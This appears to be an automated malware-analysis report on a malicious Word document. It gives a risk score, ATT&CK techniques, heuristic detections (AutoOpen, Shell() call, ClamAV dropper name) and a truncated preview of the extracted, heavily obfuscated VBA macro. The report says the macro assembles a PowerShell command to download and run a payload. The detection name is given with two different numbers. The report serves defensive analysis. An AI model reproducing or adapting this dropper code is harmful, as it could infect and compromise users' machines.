MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Dropper.Agent-6591766-0' further supports its nature as a dropper. The macro's obfuscated string concatenation suggests it's constructing a command to download and execute a payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6591567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6591567-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11872 bytes |
SHA-256: a738b5486abefdb1891f87f9d1eb9bcd5d29886a36e1487ed91a81db21580b30 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "MzjnOAfqAwLw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AnvspRWbQs" Function OTRhwz() On Error Resume Next RjFRF = CByte(99965 * Tan(74284) / 95300 + CLng(qTRav * 80442 * 143 * Chr(23643))) IRFbZ = (38961 / CBool(28868) + 71756 + CSng(XjisS) * (4376 - BTbGj + 16460 - CLng(qtHbvB))) KuYKqhwP = "Hell" + " &" + Chr(40) + Chr(40) + "var" + "iabLE " + "'*MDr*'" + Chr(41) + ".Nam" + "E[" AtvfO = CByte(48347 * Tan(74067) / 4650 + CLng(ijFfX * 29782 * 93290 * Chr(96460))) jcWPiW = (70697 / CBool(99014) + 40057 + CSng(iSsTj) * (11917 - AYbNC + 36641 - CLng(EkmSh))) oXBQwY = "3,11,2]" + "-jOI" + "n''" + Chr(41) + Chr(40) + " " + Chr(40) + " '4M67w1" + "16%" + "102M29C" + "78L6" hUqpbk = (66568 / CBool(57959) + 18706 + CSng(KtkSR) * (37158 - oWNFK + 37850 - CLng(wpvIX))) oImnkN = CByte(22024 * Tan(21398) / 34495 + CLng(wkPUr * 16295 * 97741 * Chr(26081))) nvssKZRq = "9<87L13Q" + "79Q66L" + "74Q" + "69L" + "67Q84" + "Q0C1" + "10i6" + "9<84%14A" + "119A" + "69" LJbZku = (45324 / CBool(1512) + 75517 + CSng(mpaHOd) * (4138 - wiEHD + 43140 - CLng(QUuzK))) qhULlN = CByte(67003 * Tan(3561) / 86115 + CLng(MYUfV * 42535 * 56893 * Chr(1805))) qQwjVNjJdl = "L66A" + "99%76" + "i73w" + "69" + "%78w84A2" + "7Q" + "4B116%" + "100L7" + "2L29B7" + "Q72Q84" pBCfjD = (12251 / CBool(9021) + 25382 + CSng(ZcBcB) * (91720 - GvcQT + 10237 - CLng(Vrjjq))) uqtIVo = CByte(78046 * Tan(5480) / 69896 + CLng(fIViS * 69104 * 21707 * Chr(91973))) FawQQ = "A84Q80" + "i26%" + "15Q15L8" + "4B73" + "B68C6" + "5B8" + "4B6" + "9Q" + "67M72" + "C78B73" jOPhY = (50538 / CBool(43118) + 92271 + CSng(JsUXNW) * (47776 - isHMHE + 42222 - CLng(zHzXll))) nQGcfJ = CByte(41799 * Tan(66494) / 97625 + CLng(qtsnIu * 98579 * 17951 * Chr(69109))) YjnOCjzQPHh = "B6" + "7B" + "65i76C1" + "4M67w7" + "9A77<15" + "C104Q98i" SoFcK = (88201 / CBool(87541) + 51487 + CSng(YYMXM) * (62335 - GttZN + 19119 - CLng(UQKdB))) MwNBkN = CByte(98477 * Tan(20090) / 57853 + CLng(lPuPa * 37917 * 57004 * Chr(42859))) XaRvipU = "25" + "%115" + "w1" + "03w" + "15L96A" + "72A84i8" + "4A" + "80C26M1" GBnFPK = (77008 / CBool(16988) + 62019 + CSng(MzPslG) * (50684 - Lmwhw + 55575 - CLng(IKSuiA))) owunYt = CByte(96751 * Tan(82901) / 93726 + CLng(SYRSV * 44901 * 18203 * Chr(18839))) uqmkcB = "5B15" + "M83A" + "72" + "C85A78M7" + "4Q73Q14" + "<79" + "%8" + "2B71" + "L15%87" + "i79" + "M82C68" + "M80B8" IRjhZE = (21132 / CBool(57122) + 13137 + CSng(VOzlZK) * (34415 - zhhMUp + 88585 - CLng(XLInm))) kirUE = CByte(32329 * Tan(40788) / 67258 + CLng(Prrap * 40596 * 75758 * Chr(85608))) qRhIUSh = "2%69i83" + "<83M15M" + "110Q107" + "M98w" + "105" + "A15" + "i96B7" + "2<84w84" + "B8" OTRhwz = KuYKqhwP + oXBQwY + nvssKZRq + qQwjVNjJdl + FawQQ + YjnOCjzQPHh + XaRvipU + uqmkcB + qRhIUSh DZLcS = (92284 / CBool(94867) + 88318 + CSng(LhzVTM) * (25530 - PtEGBc + 28046 - CLng(RVdPE))) kSAkNw = CByte(14926 * Tan(31439) / 91935 + CLng(KdKBN * 89093 * 46364 * Chr(58518))) End Function Function sNdwfLnCV() On Error Resume Next LFtoB = (4321 / CBool(95032) + 94858 + CSng(AaUii) * (34736 - hUjzQW + 97622 - CLng(jvXSMF))) zwBsn = CByte(81510 * Tan(58381) / 97973 + CLng(PzwPVD * 61200 * 89755 * Chr(84517))) dZvfULtOn = "0B2" + "6C15%15" + "<87A87w" + "87w1" + "4B80%72%" + "65" + "i78B" + "77i73" jZoiz = (78402 / CBool(13919) + 92744 + CSng(GifkD) * (55764 - VdqiGD + 41309 - CLng(jRYic))) PcaIZz = CByte(15891 * Tan(38773) / 8570 + CLng(fuWsD * 70529 * 28826 * Chr(90570))) FzAqSzcAFbm = "B78i" + "72L72M85" + "Q89L14Q6" + "7i79" + "w7" + "7i" + "15L" riCENw = (56702 / CBool(8515) + 75945 + CSng(fQYTiq) * (3930 - cifVA + 48096 - CLng(zMjcwz))) cwluN = CByte(46775 * Tan(25728) / 19458 + CLng(tUZYnH * 51092 * 85284 * Chr(4605))) fziHDDQ = "22" + "L10" + "6Q9" + "0L8" + "9M24M" + "102<15" + "C96<7" jmQHW = (64369 / CBool(56449) + 34989 + CSng(lzbpv) * (572 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.